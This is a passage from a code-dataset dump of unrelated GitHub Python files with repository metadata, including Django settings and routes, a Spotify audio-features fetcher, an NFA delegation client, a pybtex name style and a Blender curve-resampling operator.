    res = cur.fetchall()
    # PRAGMA table_info rows are (cid, name, type, ...); element 1 is the name.
    # FIX: `map(...) + map(...)` fails at runtime on Python 3 because map()
    # returns an iterator there; list comprehensions behave identically on
    # Python 2 and also work on Python 3.
    cols = [info[1] for info in c1] + [info[1] for info in c2]
    analyze_table(cols, res, 'INJ_SEV')
if __name__ == '__main__':
    # Open the SQLite database, run the analysis, then tidy up the handles.
    connection = sqlite3.connect('traffic.db')
    connection.text_factory = str
    cursor = connection.cursor()
    analyze_person_accident(connection, cursor)
    cursor.close()
    connection.close()
| [
"[email protected]"
]
| |
f8dab2f0e3f3dfa5c4a51b8eadc87e0c3034cb09 | fd3436480761c48535da13752ed7681abdbd535d | /delegate.py | 4131f9203dd01d50b2ff11f5c38eedbc49f49024 | []
| no_license | jayantjain100/nfa_computation_delegation | ea932047ec0e99ec3490e45d62e86f377596a799 | 9632d5489e6a9332474496fae4d3f82d876c1009 | refs/heads/master | 2020-07-24T09:10:49.844887 | 2019-12-02T05:18:01 | 2019-12-02T05:18:01 | 207,878,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py | from nfa import NFA
import socket
from socket_sending import receive_object
from socket_sending import send_object
import argparse
def verify_yes_ans(given_label, final_labels):
    """Return True iff the prover's label is one of the expected final labels."""
    # The membership test already yields the boolean; no if/else needed.
    return given_label in final_labels
# Command-line interface: where to reach the prover's server.
parser = argparse.ArgumentParser(description='client that delegates NFA computation to prover and verifies')
parser.add_argument('--ip', metavar='ip', type=str, default='127.0.0.1',
                    help='the ip address of the server where the prover is running, default is localhost')
parser.add_argument('--port', metavar = 'port', type = int, default = 12345, help='port number of server to connect to, default is 12345 ')
# NOTE: parsed at import time, so importing this module consumes sys.argv.
args = parser.parse_args()
def delegate(nfas, input_string, indexes):
    """Garble selected NFAs, send them to the prover, and verify the replies.

    nfas: sequence of NFA objects; `indexes` selects which ones to delegate.
    input_string: the word whose acceptance is being tested.
    Returns a list of booleans, one per delegated NFA: True only when the
    prover answered "yes" AND backed it with a label from the expected set.
    """
    to_send = []
    corresponding_final_labels = []
    print('Creating garbled NFAs...')
    for ind in indexes:
        gnfa, final_labels = nfas[ind].garble(input_string)
        to_send.append(gnfa)
        corresponding_final_labels.append(final_labels)

    print('Sending garbled NFAs...')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # port = 45000
    s.connect((args.ip, args.port))
    send_object(s, to_send)

    print('Waiting to receive result from prover...')
    received_ans = receive_object(s)
    print('Received the result.!')
    print()

    final_ans = []
    # FIX: enumerate instead of range(len(...)); the redundant re-test of
    # ans[0] in the elif branch is dropped (it is already known truthy).
    for ind, ans in enumerate(received_ans):
        if not ans[0]:  # prover says "no" -- nothing to verify
            final_ans.append(False)
        elif verify_yes_ans(ans[1], corresponding_final_labels[ind]):  # yes, confirmed
            final_ans.append(True)
        else:  # "yes" but the proof does not check out
            final_ans.append(False)
    return final_ans
| [
"[email protected]"
]
| |
df0a60238544af1eabcce7960d656b63097a4e40 | d98b0d74639be1b7fdd737b4ddb6938d74157865 | /mysite/settings.py | 7e61b134ea0d195d268887d0a08fef0772a4b465 | []
| no_license | sebastiansilbernagl/djangogirls-blog | e70d2d673be67145fc8cc12cde3d7dba5a9e5bf9 | 15df60e2af4dadf01165efe6817dea2f6a7e2c65 | refs/heads/master | 2020-05-23T10:14:35.840139 | 2017-01-30T12:52:44 | 2017-01-30T12:52:44 | 80,407,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,232 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4)r8d1vo+6v4a&940f7t53g9cozbz9)(^8cbi--m5qe5hju%2l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'sebsilbernagl.pythonanywhere.com', 'localhost',]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Johannesburg'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"[email protected]"
]
| |
1dccfb0f90cf749916c6492d1e8a811a652e9e72 | 39b916e8969712a31195586ba6666744342b0fcf | /inheritance.py | b94276e67bcb37d6bdd1c591fbef51731a5cbdf0 | []
| no_license | bhumphris/Inheritance | 165391f1e4125d63d6fd7bb7447fb3860f52020a | e61a833c9b4eb49981fa91db31b53b7f450cfc03 | refs/heads/master | 2020-06-13T15:48:09.292442 | 2016-12-02T05:27:28 | 2016-12-02T05:27:28 | 75,363,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | import officeFurniture
def main():
    """Build a sample Desk and print each of its attributes."""
    desk = officeFurniture.Desk("Desk", "Metal", 48, 20, 36, 2, "Left", 3, 155.50)
    print("Product: " + desk.get_category())
    print("Material: " + desk.get_material())
    print("Length: " + str(desk.get_length()))
    print("Width: " + str(desk.get_width()))
    print("Height: " + str(desk.get_height()))
    print("Number of Drawers: " + str(desk.get_drawers()))
    print("Location of Drawers: " + desk.get_location())
    print("Quantity: " + str(desk.get_quantity()))
    print("Price: ${:0,.2f}\n".format(desk.get_price()))
    # FIX: the bare "print desk" statement form is Python-2-only; the call
    # form below prints identically on Python 2 and also works on Python 3,
    # matching every other print in this function.
    print(desk)
# Run the demo when the module is executed.
main()
| [
"[email protected]"
]
| |
36c64c45720f28189ea436e39cd685e6744f24e4 | 7a37bd797ea067685c887328e3b447e008e8c170 | /resourceserver/resourceserver/urls.py | e551621de72683b31896faeaa5739218174e3612 | []
| no_license | Telmediq/hydrapoc | 2e73f1b82d64d9f6b0e429e124923ede080c40a7 | b22e0a22e97705ced2379e145c798ea2f66de25d | refs/heads/master | 2020-07-14T23:32:30.147831 | 2019-09-17T21:10:04 | 2019-09-17T21:10:04 | 205,427,268 | 0 | 0 | null | 2019-12-05T00:10:34 | 2019-08-30T17:23:05 | C# | UTF-8 | Python | false | false | 1,059 | py | """resourceserver URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from resourceserver import views
# URL routing table: OAuth2 demo endpoints plus the Django admin.
urlpatterns = [
    path('oauth2/init', views.oauth_start, name='oauth2-init'),
    path('oauth2/finish', views.oauth_finish, name='oauth2-finish'),
    path('login', views.login, name='login'),
    path('protected', views.protected),
    # <identifier> is captured from the URL and passed to view_token.
    path('token/<identifier>', views.view_token),
    path('admin/', admin.site.urls),
]
| [
"[email protected]"
]
| |
530cc38befdec212750b6f4b4eefc95536c4852c | 39a7bc82dc6b08dc347816859eddc1ebd590138c | /chapter02/06-bisect.insort.py | a2a6b85c83d4b643e534321cd93627e1c0eebb3c | []
| no_license | mgw2168/fluent_python | 1a21568a70708b390e169e4126eebe76a0296d29 | ab075e33290f75d690d455e42d3ff17f4d1e29ba | refs/heads/master | 2020-07-04T22:46:12.695267 | 2019-12-05T08:05:56 | 2019-12-05T08:05:56 | 202,447,177 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | import bisect
import random
SIZE = 7
# Fixed seed so every run produces the same sequence of random items.
random.seed(1729)

my_list = []
# bisect.insort keeps my_list in ascending order as each item is inserted.
for _ in range(SIZE):
    item = random.randrange(SIZE * 2)
    bisect.insort(my_list, item)
    print('%2d ->' % item, my_list)
| [
"[email protected]"
]
| |
797ecbc116b4a0204337d20868dc1e94f0595a59 | d74cf31046b9cf7d6ea77ab3e9ed1f293beabeb9 | /charts_analyzer.py | b1f4b099e9a0a8ed64b168ca5700f71a0350beed | []
| no_license | sampurkiss/song_features | 789c6ad01455528af3c7c667218301ee8d1312b2 | 6ab81b4059645c143c1be478e335146283e85c73 | refs/heads/master | 2020-05-06T20:00:00.832903 | 2019-06-02T03:59:50 | 2019-06-02T03:59:50 | 180,215,794 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,847 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 13:05:13 2019
@author: Sam Purkiss
"""
import os
# NOTE: hard-coded working directory — this script only runs from this machine/path.
os.chdir('C:/Users/sam purkiss/Documents/Code/Music/')
import pandas as pd
import spotipy
import re
from spotipy.oauth2 import SpotifyClientCredentials
from credentials import CLIENT_ID,CLIENT_SECRET
#Need to create a credentials file with your spotify api keys
# Module-level Spotify client shared by get_music_features below.
client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
# Chart entries whose artist/song strings are known to confuse the Spotify
# search-query builder in get_music_features (kept for reference/debugging;
# not used elsewhere in this chunk).
names_giving_probs = ['21 savage & metro boomin featuring future',
                      '21 savage, offset metro boomin ring quavo',
                      '21 savage, offset metro boomin ring travis scott',
                      'Dont Trust Me',
                      'Hit It Again',
                      'a r rahman & the pussycat dolls featuring nicole scherzinger',
                      'A Change Is Gonna Come',
                      '\'N Sync']
def get_music_features(artist_name, song_name):
    """
    Spotify API caller to pull features for individual tracks.
    Paramaters:
        artist_name: name of artist
        song_name: song by artist of interest
    Returns: a one-row pandas DataFrame with track/artist/album ids, the
        release date, the search query used, and the audio-feature variables
        identified in the API documentation:
            https://developer.spotify.com/documentation/web-api/reference/tracks/get-audio-features/
        The frame is EMPTY when the search returns no usable result.
    Usage:
        client_credentials_manager = SpotifyClientCredentials(CLIENT_ID,CLIENT_SECRET)
        spotify = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
        song_features = get_music_features('the cure','Friday im in love')
    """
    # Regex fragments stripped from the ARTIST string. The .+ suffixes drop
    # everything after the matched word (e.g. "X Featuring Y" -> "X"),
    # because Spotify search copes badly with multi-artist credit strings.
    words_to_remove = ['&.+',
                       'featuring.+',#the .+ is a regex expression that
                       # will strip off words following the main word.
                       #Eg "Alvin And The Chipmunks Featuring Chris Classic"
                       #becomes just "Alvin And The Chipmunks." This is
                       #necessary because Spotify search often has a hard time
                       #finding songs with multiple featured artists.
                       #This may cause an issue where songs that are have versions
                       #with and without different artists aren't distinguished
                       #between
                       'feat..+',
                       'feat.+',
                       'with.+',
                       '(?<= )[\+](?= ).+',
                       'duet',
                       '(?<= )[xX](?= )',
                       #note that this will only strip the x away if there's
                       #an x with spaces on both sides
                       "'",
                       '\*',
                       "\(",
                       "\)"
                       ]
    # Regex fragments stripped from the SONG title.
    words_to_remove_from_songs =["'",
                                 '[a-zA-Z]+(\*)+(?P<named_group>).+(?= )',#used for capturing
                                 #words that are censored eg N***s,
                                 '\([a-zA-Z]+.+\)' #remove any words in brackets
                                 ]

    # NOTE(review): only the artist is lower-cased; the song title keeps its
    # original casing in the query.
    artist = artist_name.lower()
    song = song_name
    for word in words_to_remove:
        artist = re.sub(word,'',artist)
    for word in words_to_remove_from_songs:
        song = re.sub(word,'', song)
    #Generate database used to hold returned items
    song_details= pd.DataFrame()

    try:
        query = 'track:%s artist:%s' %(song,artist)
        result = spotify.search(q=query)
        #Select the first item (assume spotify returns what I want on first result)
        first_result = result['tracks']['items'][0]
        #From first result, pull specific variables
        track_id = first_result['id']
        album_id = first_result['album']['id']
        artist_id = first_result['artists'][0]['id']
        release_date = first_result['album']['release_date']
        #Add variables to dataframe; the original (uncleaned) names are kept
        #so rows can be joined back to the chart data.
        song_details['Performer'] = [artist_name]
        song_details['Song'] = [song_name]
        song_details['track_id'] = [track_id]
        song_details['artist_id'] = [artist_id]
        song_details['album_id'] = [album_id]
        song_details['release_date'] = [release_date]
        song_details['search_query'] = [query]
        # Audio features (danceability, energy, tempo, ...) for the track.
        track_features = spotify.audio_features(tracks=track_id)
        if len(track_features)>1:
            print('multiple songs are returned for some reason')
        track_features = track_features[0]
        # One DataFrame column per audio-feature key.
        for key, value in track_features.items():
            song_details[key] = [value]

    except IndexError: #for few weird ones + cases where song isn't on spotify
        # No search hit (items[0] failed) — return the empty frame.
        print("Search term \"%s\" is giving trouble" %(query))
        pass
    return(song_details)
| [
"[email protected]"
]
| |
1da5693613af676b6218173be8e0870435f4b8b1 | 7b695f34ee8a45f7609064ec47e861825f2d96a8 | /week4/multiplication.py | 4b2154562589d72befaaa62da3ad7cee1620d82a | []
| no_license | deciduously/cmit135 | de0c151c3642f25ecc6ef76d299d46b7810c753e | a74544f529a654e499ef34d6ca1a35c0b5cd71d2 | refs/heads/master | 2020-04-19T06:19:55.122853 | 2019-02-28T00:13:41 | 2019-02-28T00:13:41 | 168,014,573 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 827 | py | # multiplication.py pretty prints a multiplication table
# Function to return the number of digits a number n has
def num_digits(n):
# Converts it to a string a counts the length - the math way would work too but this is easy
return len(str(n))
def draw_table(n):
    """Pretty-print an n-by-n multiplication table with aligned columns.

    Every cell is right-padded relative to the widest possible product
    (n*n) so columns line up regardless of digit count.
    """
    # Widest value in the table; computed once outside the loops.
    total_size = n * n
    # range(1, n + 1) so the table actually includes n: the original
    # range(1, n) stopped at n-1, printing a 9x9 table for draw_table(10).
    for i in range(1, n + 1):
        for j in range(1, n + 1):
            current_cell = i * j
            # Pad each cell to the width of the largest product, plus one
            # separating space.
            padding = ' ' * (1 + num_digits(total_size) -
                             num_digits(current_cell))
            print(padding + str(current_cell), end="")
        print()


# draw with 10
draw_table(10)
| [
"[email protected]"
]
| |
62ab32f13bfb48de1118f28c062ed0d2f5702325 | 6e5c83baa19e09bcc59300d764ce936f8cbe6b5b | /pybtex/style/names/plain.py | 62c0c2ca311b0e086a1a078c4410d14d84d02f38 | [
"MIT"
]
| permissive | rybesh/pybtex | 84e10b12f6c9ade0de2af638bfc23945109eff6d | 18e0b5336f07ebc5dc97aa899362fb292ea7bb5a | refs/heads/master | 2016-08-07T20:15:26.865726 | 2011-03-18T18:03:48 | 2011-03-18T18:03:48 | 1,246,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,441 | py | # Copyright (c) 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from pybtex.style.template import join
from pybtex.style.names import BaseNameStyle, name_part
class NameStyle(BaseNameStyle):
    name = 'plain'

    def format(self, person, abbr=False):
        r"""
        Format names similarly to {ff~}{vv~}{ll}{, jj} in BibTeX.

        >>> from pybtex.core import Person
        >>> name = Person(string=r"Charles Louis Xavier Joseph de la Vall{\'e}e Poussin")
        >>> plain = NameStyle().format

        >>> print plain(name).format().plaintext()
        Charles Louis Xavier<nbsp>Joseph de<nbsp>la Vall{\'e}e<nbsp>Poussin
        >>> print plain(name, abbr=True).format().plaintext()
        C.<nbsp>L. X.<nbsp>J. de<nbsp>la Vall{\'e}e<nbsp>Poussin

        >>> name = Person(first='First', last='Last', middle='Middle')
        >>> print plain(name).format().plaintext()
        First<nbsp>Middle Last
        >>> print plain(name, abbr=True).format().plaintext()
        F.<nbsp>M. Last

        >>> print plain(Person('de Last, Jr., First Middle')).format().plaintext()
        First<nbsp>Middle de<nbsp>Last, Jr.
        """
        # Build each BibTeX-style name part separately, then join them:
        # {ff~} first + middle, {vv~} the "von" particle, {ll} last name,
        # {, jj} the lineage ("Jr."-style) suffix.
        first_middle = name_part(tie=True) [person.first(abbr) + person.middle(abbr)]
        von = name_part(tie=True) [person.prelast()]
        last = name_part [person.last()]
        lineage = name_part(before=', ') [person.lineage()]
        return join [first_middle, von, last, lineage]
| [
"[email protected]"
]
| |
86e497f7d8b7f8e601d5bdf3d3d634b51fbc04bf | e82b761f53d6a3ae023ee65a219eea38e66946a0 | /All_In_One/addons/hair_tool/curves_resample.py | bbf794543f831be09e4c96a6a4ed9485f74a8093 | []
| no_license | 2434325680/Learnbgame | f3a050c28df588cbb3b14e1067a58221252e2e40 | 7b796d30dfd22b7706a93e4419ed913d18d29a44 | refs/heads/master | 2023-08-22T23:59:55.711050 | 2021-10-17T07:26:07 | 2021-10-17T07:26:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,061 | py | # This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Copyright (C) 2017 JOSECONSCO
# Created by JOSECONSCO
import bpy
import math
import numpy as np
from bpy.props import EnumProperty, FloatProperty, BoolProperty, IntProperty, StringProperty
from .resample2d import interpol_Catmull_Rom, get_strand_proportions
class HT_OT_CurvesResample(bpy.types.Operator):
    """Blender operator: re-sample every (or every selected) spline of the
    active curve object to a chosen number of points, interpolating point
    positions with a Catmull-Rom fit and linearly interpolating per-point
    radius and tilt.  The splines are rebuilt as BEZIER/NURBS/POLY
    according to ``hairType``.
    """
    bl_label = "Curve resample"
    bl_idname = "object.curve_resample"
    bl_description = "Change ammount of points on curve"
    bl_options = {"REGISTER", "UNDO"}
    # Spline type of the rebuilt curves (defaulted to the input type in invoke()).
    hairType: bpy.props.EnumProperty(name="Output Curve Type", default="NURBS",
                                     items=(("BEZIER", "Bezier", ""),
                                            ("NURBS", "Nurbs", ""),
                                            ("POLY", "Poly", "")))
    # bezierRes: IntProperty(name="Bezier resolution", default=3, min=1, max=12)
    # Target number of points per output strand.
    t_in_y: IntProperty(name="Strand Segments", default=8, min=3, max=20)
    # Space points evenly along arc length instead of following the input spacing.
    uniformPointSpacing: BoolProperty(name="Uniform spacing", description="Distribute stand points with uniform spacing", default=False)
    # If off, shorter strands get proportionally fewer output points.
    equalPointCount: BoolProperty(name="Equal point count", description="Give all cures same points count \n"
                                  "If disabled shorter curves will have less points", default=False)
    onlySelection: BoolProperty(name="Only Selected", description="Affect only selected points", default=False)

    def invoke(self, context, event):
        """Seed operator settings from the active curve, then run execute().

        Captures the input spline type (and NURBS order), an initial point
        count taken from the first spline, and the curve resolution.
        """
        particleObj = context.active_object
        # Edit mode implies the user wants to affect only selected points.
        if particleObj.mode == 'EDIT':
            self.onlySelection = True
        elif particleObj.mode == 'OBJECT':
            self.onlySelection = False
        Curve = context.active_object
        if not Curve.type == 'CURVE':
            self.report({'INFO'}, 'Use operator on curve type object')
            return {"CANCELLED"}
        # NOTE(review): splines[0] raises IndexError on a curve with no
        # splines -- the len() check below comes too late to guard this.
        self.input_spline_type = Curve.data.splines[0].type
        self.hairType = self.input_spline_type  # hair type - output spline
        if self.input_spline_type == 'NURBS':
            self.nurbs_order = Curve.data.splines[0].order_u
        if len(Curve.data.splines) > 0:  # do get initnial value for resampling t
            polyline = Curve.data.splines[0]  # take first spline len for resampling
            if polyline.type == 'NURBS' or polyline.type == 'POLY':
                self.t_in_y = len(polyline.points)
            else:
                self.t_in_y = len(polyline.bezier_points)
        self.bezierRes = Curve.data.resolution_u
        return self.execute(context)

    def execute(self, context):
        """Rebuild the curve's splines with the resampled point data.

        NOTE(review): relies on attributes set only in invoke()
        (input_spline_type, nurbs_order, bezierRes) -- running execute()
        without invoke() first would raise AttributeError; confirm against
        how Blender dispatches this operator.
        """
        curveObj = context.active_object
        if curveObj.type != 'CURVE':
            self.report({'INFO'}, 'Works only on curves')
            return {"CANCELLED"}
        pointsList = []      # per-strand list of 3D point coordinates
        pointsRadius = []    # per-strand list of point radii
        pointsTilt = []      # per-strand list of point tilts
        selectedSplines = []
        if self.onlySelection:
            # A spline counts as selected when any of its points is selected;
            # fall back to all splines when nothing is selected.
            for polyline in curveObj.data.splines:
                if polyline.type == 'NURBS' or polyline.type == 'POLY':
                    if any(point.select == True for point in polyline.points):
                        selectedSplines.append(polyline)
                else:
                    if any(point.select_control_point == True for point in polyline.bezier_points):
                        selectedSplines.append(polyline)
            if not selectedSplines:
                selectedSplines = curveObj.data.splines
        else:
            selectedSplines = curveObj.data.splines
        # Collect the raw point data from every spline being resampled.
        for polyline in selectedSplines:  # for strand point
            if polyline.type == 'NURBS' or polyline.type == 'POLY':
                points = polyline.points
            else:
                points = polyline.bezier_points
            if len(points) > 1:  # skip single points
                pointsList.append([point.co.to_3d() for point in points])
                pointsRadius.append([point.radius for point in points])
                pointsTilt.append([point.tilt for point in points])
        # Remember material slots so the rebuilt splines keep their materials.
        backup_mat_indices = [spline.material_index for spline in selectedSplines]
        interpolRad = []
        interpolTilt = []
        # Catmull-Rom resampling of positions (helper from .resample2d).
        splinePointsList = interpol_Catmull_Rom(pointsList, self.t_in_y, uniform_spacing = self.uniformPointSpacing, same_point_count=self.equalPointCount)
        if self.equalPointCount:  # each output spline will have same point count
            # Normalized parameter values shared by all strands.
            t_ins_y = [i / (self.t_in_y - 1) for i in range(self.t_in_y)]
            for radii, tilts in zip(pointsRadius, pointsTilt):  # per strand
                t_rad = [i / (len(radii) - 1) for i in range(len(radii))]
                interpolRad.append(np.interp(t_ins_y, t_rad, radii))  # first arg len() = out len
                interpolTilt.append(np.interp(t_ins_y, t_rad, tilts))  # first arg len() = out len
        else:  # shorter output splines will have less points
            lens = [len(x) for x in splinePointsList]
            for radii, tilts, strandLen in zip(pointsRadius, pointsTilt, lens):  # per strand
                t_ins_Normalized = [i / (strandLen - 1) for i in range(strandLen)]
                t_rad = [[i / (len(radii) - 1) for i in range(len(radii))]]
                interpolRad.append(np.interp(t_ins_Normalized, t_rad[0], radii))  # first arg len() = out len
                interpolTilt.append(np.interp(t_ins_Normalized, t_rad[0], tilts))  # first arg len() = out len
        curveData = curveObj.data
        # spline_type =
        # Drop the old splines: only the resampled ones when working on a
        # selection, otherwise everything.
        if self.onlySelection:
            for spline in selectedSplines:
                curveData.splines.remove(spline)
        else:
            curveData.splines.clear()
        newSplines = []
        for k, splinePoints in enumerate(splinePointsList):  # for each strand/ring
            curveLenght = len(splinePoints)
            polyline = curveData.splines.new(self.hairType)
            newSplines.append(polyline)
            # A new spline starts with one point, hence "count - 1" adds.
            if self.hairType == 'BEZIER':
                polyline.bezier_points.add(curveLenght - 1)
            elif self.hairType == 'POLY' or self.hairType == 'NURBS':
                polyline.points.add(curveLenght - 1)
                if self.hairType == 'NURBS':
                    # Keep the input order when it was NURBS, else use cubic.
                    polyline.order_u = self.nurbs_order if self.input_spline_type == 'NURBS' else 3
                    polyline.use_endpoint_u = True
            # Homogeneous coordinates: POLY/NURBS points store (x, y, z, w).
            np_splinePointsOnes = np.ones((len(splinePoints), 4))  # 4 coord x,y,z ,1
            np_splinePointsOnes[:, :3] = splinePoints
            if self.hairType == 'BEZIER':
                polyline.bezier_points.foreach_set('co', np_splinePointsOnes[:, :3])
                polyline.bezier_points.foreach_set('radius', interpolRad[k])
                polyline.bezier_points.foreach_set('tilt', interpolTilt[k])
                polyline.bezier_points.foreach_set('handle_left_type', 'AUTO')
                polyline.bezier_points.foreach_set('handle_right_type', 'AUTO')
            else:
                polyline.points.foreach_set('co', np_splinePointsOnes.ravel())
                polyline.points.foreach_set('radius', interpolRad[k])
                polyline.points.foreach_set('tilt', interpolTilt[k])
        curveData.resolution_u = self.bezierRes
        # bpy.ops.object.curve_uv_refresh()
        # Restore the material assignment captured before the rebuild.
        for backup_mat, newSpline in zip(backup_mat_indices, newSplines):
            newSpline.material_index = backup_mat
        return {"FINISHED"}
| [
"[email protected]"
]
| |
32b358403cf8563ce1aad3ed0d74d9abb0359e78 | c5edd407319c80640ed4e2819838fec94ee7a345 | /raterz/settings.py | 31ebd662a31757c7cdfd225ed059c47ef34cb724 | [
"MIT"
]
| permissive | OwenMur21/raterz | 41abece2ac878932a36367b3e12482a9c34ac68c | 2e028e1fbb8832d90731fec10d5c3401b543384c | refs/heads/master | 2020-04-01T01:31:08.865849 | 2018-10-17T04:48:41 | 2018-10-17T04:48:41 | 152,741,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,577 | py | import os
import django_heroku
import dj_database_url
from decouple import config, Csv
# Configuration mode, read once from the environment with a "dev" fallback.
MODE = config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)

# development
# Use the MODE variable read above (which carries the "dev" default) instead
# of calling config('MODE') a second time: the original second call had no
# default, so an unset MODE env var raised decouple.UndefinedValueError.
if MODE == "dev":
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.postgresql_psycopg2',
            'NAME': config('DB_NAME'),
            'USER': config('DB_USER'),
            'PASSWORD': config('DB_PASSWORD'),
            # 'HOST': config('DB_HOST'),
            # 'PORT': '',
        }
    }
# production
else:
    DATABASES = {
        'default': dj_database_url.config(
            default=config('DATABASE_URL')
        )
    }

# Heroku-style override: when DATABASE_URL is present it supersedes the
# settings above; keep connections open for up to 500 s.
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# NOTE(review): '*' accepts any Host header; fine behind Heroku's router but
# should be narrowed for other deployments.
ALLOWED_HOSTS = ['*']
# Project root (two levels above this settings module).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'pro.apps.ProConfig',
    'bootstrap3',
    'rest_framework',
    'rest_framework.authtoken',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    # WhiteNoise serves the collected static files directly from the app.
    'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'raterz.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'django.template.context_processors.media',
            ],
        },
    },
]
WSGI_APPLICATION = 'raterz.wsgi.application'
